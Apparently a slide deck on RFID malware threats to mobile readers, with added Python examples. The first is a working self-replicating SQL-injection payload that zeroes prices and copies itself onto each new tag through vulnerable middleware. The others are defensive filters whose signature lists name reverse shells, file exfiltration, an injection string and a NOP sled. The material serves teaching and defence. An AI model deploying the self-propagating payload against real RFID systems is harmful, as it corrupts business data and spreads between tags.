A Comprehensive Study of RFID Malware on Mobile Devices TBD
Outline
– Motivation
– State of the art: malware and countermeasures for RFID and mobile systems
  – RFID security challenge
  – Mobile security challenge
  – New challenge from RFID malware on mobile devices
– Extended threat model
– Basic design of an anti-malware framework for mobile devices in RFID systems
– Conclusion
Motivation
RFID security on mobile devices faces a severe challenge, because
– RFID systems are still in their infancy, and many of them lack security protection.
– To improve productivity, more mobile devices will be used as readers, and mobile systems are more vulnerable than non-portable systems.
The limitations that have kept RFID malware impractical are being relaxed as the technology develops:
– Cheaper RFID tags with larger storage capacity can hold more malicious data.
– Better network connectivity for mobile devices makes malware propagation easier.
New Opportunities for RFID Malware
C1: The tag data size limit (<1024 bits) makes RFID malware unrealistic. Relaxed: EPC Gen2 Class 3 tags have at least kilobytes of storage.
C2: RFID systems are closed-loop systems. Relaxed: the new EPCglobal Architecture standard may require exchanging data with the EPCglobal Network over the Internet.
C3: More mobile devices will be used as RFID readers.
Lessons from Practice (1/2)
L1: A small number of bits is enough to construct RFID malware. RFID malware can spread by modifying the database from which new tag values are written.
– In 2006, researchers at Vrije Universiteit Amsterdam proposed the first proof-of-concept RFID malware and a basic propagation model.
– Even when tag space is very limited, it is still possible to store a smaller malware trigger on a tag that wakes malware already present in the system.
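The propagation path described in L1, as an added example that is not part of the slides: tag memory is spliced into SQL by a deliberately vulnerable reader middleware, the injected statement rewrites the database, and the label printer then programmes the next tag from that database. The payload is a SQL quine (each `$` in a template is replaced by the quoted template, so the INSERT stores the payload itself), in the spirit of the 2006 proof of concept; the schema, the station logic and the payload are constructed for this illustration, and the in-memory SQLite database stands in for the back-end.

```python
"""Added example (not from the slides): a self-replicating SQL payload in
tag memory, run through a vulnerable reader middleware and then through a
parameterised one.  Schema, stations and payload are constructed."""
import sqlite3


def make_db():
    """Constructed back-end: scanned tag contents go into `inventory`;
    the label printer re-writes tags from the newest inventory row."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE inventory (id INTEGER PRIMARY KEY, contents TEXT);"
        "CREATE TABLE prices (sku TEXT, price INTEGER);"
        "INSERT INTO prices VALUES ('APPLE', 120), ('PEAR', 95);"
    )
    return db


def scan_vulnerable(db, tag_data):
    """Middleware that splices tag memory straight into SQL text and lets
    the driver run several statements: tag-borne SQL becomes executable."""
    db.executescript("INSERT INTO inventory (contents) VALUES ('" + tag_data + "');")


def scan_hardened(db, tag_data):
    """Same insert with a bound parameter: tag memory is only ever data."""
    db.execute("INSERT INTO inventory (contents) VALUES (?)", (tag_data,))
    db.commit()


def write_next_tag(db):
    """Label printer: programmes a fresh tag from the newest inventory row."""
    return db.execute("SELECT contents FROM inventory ORDER BY id DESC LIMIT 1").fetchone()[0]


def total_price(db):
    return db.execute("SELECT SUM(price) FROM prices").fetchone()[0]


def sql_quote(s):
    """Python equivalent of SQLite's quote() for text values."""
    return "'" + s.replace("'", "''") + "'"


# The template closes the INSERT's string literal, rebuilds itself with
# replace()/quote() (every '$' becomes the quoted template, a SQL quine),
# then appends the attacker's action and comments out the rest of the query.
_TEMPLATE = ("' || replace($, char(36), quote($)) || ''); "
             "UPDATE prices SET price = 0; --")
VIRUS = _TEMPLATE.replace("$", sql_quote(_TEMPLATE))   # a few hundred bytes


def propagate(scan, generations=3):
    """Read the infected tag, let the printer write a new tag from the DB,
    feed that tag to the next reader, and so on.
    Returns (tags written, total price left in the table)."""
    db = make_db()
    tag = VIRUS
    tags = []
    for _ in range(generations):
        scan(db, tag)
        tag = write_next_tag(db)
        tags.append(tag)
    return tags, total_price(db)


if __name__ == "__main__":
    print(propagate(scan_vulnerable))   # every new tag carries VIRUS, prices zeroed
    print(propagate(scan_hardened))     # text still copied, but nothing executed
```

With the vulnerable middleware every generation writes an identical copy of the payload to the next tag and the UPDATE runs each time. With the bound parameter the UPDATE never executes, but note that the payload text is still copied to the next tag as data: parameterisation stops execution, not propagation, which is why the framework later in the slides also checks tag data format and content before it reaches the database. The payload is about 240 bytes, so it needs more than the 1024-bit tags of constraint C1 but fits easily in the kilobyte-class tags mentioned above.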
Lessons from Practice (2/2)
L2: Malware may trigger exceptional control flow that bypasses purely data-level protection, so system-level protection is required.
– In 2007, German RFID experts showed how to crash an RFID reader for RFID-enabled e-passports by modifying the JPEG2000 photo image stored in the e-passport.
– The attack exploits a buffer overflow in the off-the-shelf libraries used to load the photo image.
Basic Threat Model & Countermeasures
1. Defend against cloning and counterfeiting
2. Defend against malware
3. Defend against denial of service
Less attention is paid to front-end devices such as (mobile) RFID readers!
Malware State on Mobile Devices
The first proof-of-concept mobile malware was reported in
No major outbreak of mobile malware has been reported so far.
F-Secure Cell-phone Malware Report 2007:
– 373 malware samples in total (including variants).
– Across all platforms, the total number of malware samples reaches 1 million in the Symantec Internet Security Threat Report 2007.
CVE (Common Vulnerabilities and Exposures) database:
– 138 vulnerabilities found in software on mobile systems.
– The iPhone accounts for a quarter of them.
Malware Trend on Mobile Devices
Why has mobile malware been so unpopular?
– Limited functionality of mobile devices: all existing mobile malware requires user interaction.
– Poor network connectivity allows only local propagation most of the time.
– Low potential profit: most people use only the phone functions of their mobile devices.
The situation is changing.
– New multi-function platform: iPhone.
– New network technologies: Wi-Fi, 3G.
– More people use mobile devices to store sensitive or private data: business people and college students.
Major Malware Challenge on Mobile Devices
Lack of permission control
– Most mobile systems are single-user systems running on simple hardware without runtime privilege control.
– Social engineering is widely used by mobile malware.
Limited resources
– Battery powered.
– Less computation and storage capability than general-purpose platforms.
– Resource-demanding security protections are therefore ruled out.
Countermeasure status
– Still emerging and immature; useful mostly for post-infection cleanup.
No-Tech Attacks in Mobile Malware
Figure: distribution of vulnerabilities (from CVE) and distribution of malware (from F-Secure).
Symbian OS, the most popular mobile system, has only 3 reported vulnerabilities yet the largest number of malware samples: mobile malware does not need an exploit when social engineering suffices.
New Challenge from RFID Malware on Mobile Devices
RFID systems:
– High potential profit.
– Global connectivity in the EPCglobal architecture.
Mobile systems:
– More vulnerable than their non-portable counterparts.
– Limited resources rule out resource-demanding security protection.
RFID systems + mobile systems: attractive targets for attackers.
Extended Threat Model
An RFID tag can carry: 1. a malware trigger, 2. a malware fragment, 3. a complete malware entity.
Along the chain (public domain, company domain, EPC core domain), every node may be compromised:
– Reader firmware
– Mobile device / middleware running on it
– Front-end server
– Enterprise database system
– EPCglobal Network
Bad news: every node can be compromised. Good news: they are connected in a chain.
Basic Design of an Anti-malware Framework for Mobile Devices in RFID Systems
To secure the frontier of the RFID security chain, we arm the mobile device with an Intrusion Prevention System (IPS) and an Intrusion Detection System (IDS).
Dangerous data source → IPS → IDS → middleware
IPS: filter out anything that can be filtered.
– Firewall plus checks of data format and content.
– Defends against DoS, SQL/script injection and shellcode in text input.
– Another alternative: distort binary data?
IDS: detect anything that can be detected.
– Validate program behaviour on the given data input.
– Defends against buffer overflows and other unexpected behaviour.
Open question: IDS is well known to be inefficient and resource-demanding. Is it feasible on a mobile device?
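One concrete "check data format" filter for the IPS, as an added example that is not from the slides, applied to the JPEG 2000 container in which an e-passport photo (lesson L2) arrives. It walks the JP2 box headers defined in ISO/IEC 15444-1 Annex I (4-byte big-endian length, 4-byte type, optional 8-byte extended length) and rejects a file whose declared box lengths do not fit the bytes actually present, which is the inconsistency a careless decoder turns into an out-of-bounds copy. The sample files are constructed here; this is not the 2007 researchers' crash file, and the filter knows nothing about the codestream inside the `jp2c` box.

```python
"""Added example (not from the slides): JP2 box-structure validation as an
IPS content check.  Sample inputs are constructed for the illustration."""
import struct

# Signature box: length 12, type 'jP  ', contents 0x0D0A870A.
JP2_SIGNATURE = struct.pack(">I4sI", 12, b"jP  ", 0x0D0A870A)


def walk_boxes(data):
    """Yield (type, header_len, box_len, offset) for each top-level box,
    raising ValueError at the first length that does not fit the buffer."""
    pos, n = 0, len(data)
    while pos < n:
        if n - pos < 8:
            raise ValueError(f"truncated box header at offset {pos}")
        lbox, tbox = struct.unpack_from(">I4s", data, pos)
        hdr = 8
        if lbox == 1:                       # extended 64-bit length follows
            if n - pos < 16:
                raise ValueError(f"truncated XLBox at offset {pos}")
            (lbox,) = struct.unpack_from(">Q", data, pos + 8)
            hdr = 16
        elif lbox == 0:                     # box runs to end of file
            lbox = n - pos
        if lbox < hdr:                      # length smaller than its own header:
            raise ValueError(               # the classic unsigned-underflow trigger
                f"box {tbox!r} at {pos}: length {lbox} smaller than its header")
        if lbox > n - pos:
            raise ValueError(
                f"box {tbox!r} at {pos}: declares {lbox} bytes, only {n - pos} remain")
        yield tbox, hdr, lbox, pos
        pos += lbox


def check_jp2(data):
    """Return (accepted, reason).  Accept only a consistent box sequence that
    starts with the signature box, has 'ftyp' second and carries a codestream."""
    try:
        boxes = list(walk_boxes(data))
    except ValueError as e:
        return False, str(e)
    if not boxes or data[:12] != JP2_SIGNATURE:
        return False, "missing JP2 signature box"
    if len(boxes) < 2 or boxes[1][0] != b"ftyp":
        return False, "second box must be ftyp"
    if not any(t == b"jp2c" for t, _, _, _ in boxes):
        return False, "no codestream box"
    return True, "ok"


def box(tbox, payload):
    """Build one box: 4-byte length (header included), 4-byte type, payload."""
    return struct.pack(">I4s", 8 + len(payload), tbox) + payload


# Constructed sample: minimal JP2 wrapper around a dummy codestream.
GOOD = (JP2_SIGNATURE
        + box(b"ftyp", b"jp2 " + b"\x00\x00\x00\x00" + b"jp2 ")
        + box(b"jp2h", b"")
        + box(b"jp2c", b"\xff\x4f\xff\xd9"))

# Same bytes, but the codestream box claims 64 KiB it does not carry.
OVERLONG = GOOD[:-12] + struct.pack(">I4s", 0x10000, b"jp2c") + b"\xff\x4f\xff\xd9"

# A box whose length field is smaller than its own 8-byte header.
UNDERFLOW = JP2_SIGNATURE + struct.pack(">I4s", 4, b"ftyp")

if __name__ == "__main__":
    for name, blob in (("GOOD", GOOD), ("OVERLONG", OVERLONG), ("UNDERFLOW", UNDERFLOW)):
        print(name, check_jp2(blob))
```

The filter is deliberately a rejecting whitelist: anything it cannot account for is dropped before the decoder sees it. It still only blocks what it recognises; a flaw inside a well-formed codestream passes, which is exactly why the slide pairs the IPS with behaviour-level detection in the IDS.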
Potential Techniques (1/2)
1. Good-signature checking
– Why is IDS known to be inefficient and resource-demanding? It checks the relevant signatures one by one. Complex program behaviours are inevitable in general-purpose systems, so there are many signatures to check whether good (whitelist) or malicious (blacklist) signatures are used.
– However, the functions of an RFID system are much SIMPLER than those of a general-purpose system, so checking good signatures should be affordable. For a more flexible system, combine good signatures with malicious signatures where necessary.
– Some problems: How to generate efficient good signatures automatically? How to secure the good-signature database and the IDS monitor on the mobile device? …
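A good-signature monitor of the kind described above, as an added example that is not from the slides. The legitimate behaviour of a scan handler is written down as a small whitelist automaton over the operations the middleware performs; an operation with no transition from the current state is reported, whether or not any malicious signature names it. A short blacklist of n-grams is checked alongside, as the slide suggests, so that known attacks get a precise label. The operation names, the automaton and the traces are constructed for this illustration; a real monitor would obtain the trace from hooks in the reader middleware.

```python
"""Added example (not from the slides): whitelist ("good signature")
behaviour monitoring combined with a small blacklist.  All names and traces
are constructed."""

# Positive signature: the only operation sequences a scan handler may make.
# state -> {operation: next_state}
GOOD_SIGNATURE = {
    "idle":      {"read_tag": "have_tag"},
    "have_tag":  {"validate": "validated", "read_tag": "have_tag"},
    "validated": {"db_query": "queried", "reject": "idle"},
    "queried":   {"write_tag": "idle", "log": "idle"},
}
START = "idle"

# Negative signatures: operation n-grams the legitimate program never issues.
BAD_SIGNATURES = {
    ("exec", "connect"): "reverse shell",
    ("read_file", "connect"): "file contents sent to the network",
}


def check_trace(trace):
    """Run one trace through the whitelist automaton and the blacklist.
    Returns a list of (index, operation, reason) alerts; empty means clean."""
    state = START
    alerts = []
    for i, op in enumerate(trace):
        # Blacklist: look at the 2- and 3-grams ending at this operation.
        for n in (2, 3):
            gram = tuple(trace[i - n + 1:i + 1]) if i - n + 1 >= 0 else ()
            if gram in BAD_SIGNATURES:
                alerts.append((i, op, "malicious signature: " + BAD_SIGNATURES[gram]))
        if state is None:           # already deviated; automaton is no longer meaningful
            continue
        nxt = GOOD_SIGNATURE[state].get(op)
        if nxt is None:
            alerts.append((i, op, f"not in good signature (state {state})"))
            state = None
        else:
            state = nxt
    if state not in (None, START):  # handler ended without finishing its transaction
        alerts.append((len(trace), "<end>", f"trace ended in state {state}"))
    return alerts


# Constructed traces.
NORMAL = ["read_tag", "validate", "db_query", "write_tag"]
REJECTED = ["read_tag", "validate", "reject"]
EXPLOITED = ["read_tag", "validate", "db_query", "exec", "connect"]  # image parser hijacked
UNKNOWN = ["read_tag", "write_tag"]                                  # no blacklist entry

if __name__ == "__main__":
    for name in ("NORMAL", "REJECTED", "EXPLOITED", "UNKNOWN"):
        print(name, check_trace(globals()[name]))
```

Each event costs one dictionary lookup against the automaton, independent of how many attacks are known, which is the efficiency argument of the slide; the blacklist scan grows with the number of malicious signatures, so it is kept small and only used to label what the whitelist has already stopped. The `UNKNOWN` trace shows the case the whitelist handles and a blacklist cannot: a deviation nobody has written a signature for.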
Potential Techniques (2/2)
2. Cooperative mode
– Connection to the EPCglobal Network is compulsory under the new RFID standard, so a network connection can be assumed to be available.
– To extend battery life and still enable sophisticated IDS protection, SHIFT part or all of the intrusion-detection workload to cooperative servers.
– Some problems: What kinds of workload should be shifted to the cooperative servers? What to do when the connection to the cooperative servers is lost? How to balance the workload efficiently between the mobile client and the cooperative servers? …
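One possible answer to the three questions above, as an added example that is not from the slides: the device keeps a Bloom filter of digests of known-bad tag payloads (cheap to query, no false negatives), answers the common "definitely clean" case locally, and sends only the digests the filter flags as "maybe bad" to the cooperative server for an authoritative verdict, caching what it learns. While the server is unreachable, flagged reads are quarantined and queued rather than let through. The filter size, the server's table, the payloads and the fail-closed policy are all assumptions made for this illustration.

```python
"""Added example (not from the slides): splitting intrusion-detection work
between a mobile reader and a cooperative server, with a fail-closed policy
for lost connectivity.  Filter parameters, server and payloads are constructed."""
import hashlib


class BloomFilter:
    """Minimal Bloom filter over byte strings (k SHA-256-derived positions)."""
    def __init__(self, nbits=1024, k=3):
        self.nbits, self.k = nbits, k
        self.bits = bytearray(nbits // 8)

    def _positions(self, item):
        for i in range(self.k):
            h = hashlib.sha256(i.to_bytes(1, "big") + item).digest()
            yield int.from_bytes(h[:4], "big") % self.nbits

    def add(self, item):
        for p in self._positions(item):
            self.bits[p // 8] |= 1 << (p % 8)

    def might_contain(self, item):
        return all(self.bits[p // 8] & (1 << (p % 8)) for p in self._positions(item))


def digest(payload):
    return hashlib.sha256(payload).digest()


class Server:
    """Stand-in for the cooperative server: an authoritative bad-digest table
    behind a link that can go down."""
    def __init__(self, bad_digests):
        self.bad = set(bad_digests)
        self.online = True

    def __call__(self, d):
        if not self.online:
            raise ConnectionError("cooperative server unreachable")
        return d in self.bad


class CooperativeIDS:
    def __init__(self, local_filter, server):
        self.local = local_filter
        self.server = server
        self.cache = {}        # digest -> verdict learned from the server
        self.pending = []      # digests quarantined while offline

    def inspect(self, payload):
        """Return 'clean', 'malicious' or 'quarantined' for one tag read."""
        d = digest(payload)
        if not self.local.might_contain(d):
            return "clean"                   # decided on the device, no radio used
        if d in self.cache:
            return "malicious" if self.cache[d] else "clean"
        try:
            bad = self.server(d)             # only the digest leaves the device
        except ConnectionError:
            self.pending.append(d)
            return "quarantined"             # fail closed until a verdict arrives
        self.cache[d] = bad
        return "malicious" if bad else "clean"

    def flush_pending(self):
        """When the link is back, resolve queued digests; returns {digest: verdict}."""
        resolved = {}
        while self.pending:
            d = self.pending[-1]
            try:
                bad = self.server(d)
            except ConnectionError:
                break                        # still offline, keep the queue
            self.pending.pop()
            self.cache[d] = bad
            resolved[d] = "malicious" if bad else "clean"
        return resolved


def build_demo():
    """Constructed setup: two known-bad payloads, one benign EPC-like string."""
    bad = [b"' OR 1=1 --", b"\x90" * 32 + b"\xcc"]
    good = [b"3034F5C3B8A1E0C0000000A1"]
    bf = BloomFilter()
    for p in bad:
        bf.add(digest(p))
    srv = Server(digest(p) for p in bad)
    return CooperativeIDS(bf, srv), srv, bad, good
```

The split is controlled by the filter's false-positive rate: a larger local filter means fewer reads cross the network at the cost of device memory, which is the client/server balance the slide asks about. Because the filter has no false negatives, a payload the server would condemn is never waved through locally, and "quarantined" is the only outcome while the link is down.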
Conclusion
We surveyed state-of-the-art malware and countermeasures for RFID and mobile systems, and
– proposed an extended threat model that captures the malware threats to RFID systems with mobile devices;
– discussed some potential techniques to defend against such malware threats.
Q & A TBD